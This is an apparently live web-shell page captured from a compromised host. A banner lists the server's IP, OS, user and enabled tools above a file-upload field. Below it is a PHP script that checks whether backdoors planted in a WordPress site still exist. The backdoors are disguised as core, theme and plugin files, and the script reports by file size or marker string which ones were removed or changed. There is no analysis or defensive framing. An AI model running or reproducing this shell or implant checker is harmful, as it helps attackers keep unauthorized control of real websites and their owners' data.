Server IP : 162.0.217.223 / Your IP : 216.73.216.112 Web Server : LiteSpeed System : Linux premium269.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : mypckeys ( 1539) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /dev/shm/ |
Upload File : |
<?php $r = '/home/gringost/bizontrust.com'; $x = ["/wp-mail.php"=>"bd@@124998144@@9358", "/wp-admin/ms-admin.php"=>"bd@@126213652@@813", "/wp-links-opml.php"=>"bd@@124964641@@3111", "/wp-content/themes/twentytwentyfour/patterns/text-faq.php"=>"bd@@98853984@@sync_manager", "/wp-trackback.php"=>"bd@@122078308@@buffer_cache", "/wp-includes/customize/class-wp-customize-header-image-setting.php"=>"bd@@100922727@@2527", "/wp-admin/admin-ajax.php"=>"bd@@122078322@@event_handler", "/wp-content/plugins/litespeed-cache/src/cdn/redeem_incident.php"=>"bd@@98854016@@598", "/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php"=>"bd@@117242268@@_COOKIE[3]", "/wp-content/plugins/loginizer/lib/hybridauth/HttpClient/schinese_utf8.php"=>"bd@@98841062@@553", "/wp-admin/link-add.php"=>"bd@@98840820@@unit_converter", "/wp-content/plugins/loginizer/assets/images/addcss.php"=>"bd@@98841086@@1588", "/wp-admin/options-writing.php"=>"bd@@127027132@@72", "/wp-admin/plugins.php"=>"bd@@127040180@@72", "/wp-admin/css/colors/blue/blue/cache.php"=>"bd@@127040201@@47", "/wp-admin/css/colors/blue/blue/index.php"=>"bd@@127040207@@65", "/wp-admin/options-reading.php"=>"bd@@98848058@@batch_process"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');